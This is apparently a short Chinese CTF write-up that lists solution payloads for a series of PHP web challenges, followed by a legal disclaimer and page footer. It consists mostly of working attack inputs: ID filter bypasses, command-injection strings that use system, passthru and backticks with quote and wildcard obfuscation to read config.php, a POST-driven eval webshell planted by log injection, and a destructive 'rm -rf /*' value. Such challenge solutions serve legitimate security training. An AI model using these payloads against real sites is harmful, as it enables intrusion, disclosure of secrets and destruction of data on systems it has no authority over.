[huayang]
we1-web7大抵差不多构造id=1000
web1
?id='1000'
[huayang]web2
?id=~~1000
web3
?id=680|960
web4
?id=682^322
web5
?id=800^200
web6
?id=~~1000
web7
?id=0b1111101000
web8
?flag=rm -rf /*
web9
?c=system('nl config.php');
web10
?c=show_source('config.php');
web11
?c=echo `nl config.php`;
web12
?c=echo `nl con''fig?ph''p`;
web13
?c=passthru('nl conf\ig?p\hp')?>
web14
?c=echo `nl conf''ig?p''hp`?>
web15
get:
?c=echo `$_POST[shell]`;
post:
shell=nl config.php
web16
?c=36d
web17-21
直接日志注入
<?php eval($_POST[shell]);?>
[/huayang]
FROM:浅浅淡淡[hellohy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论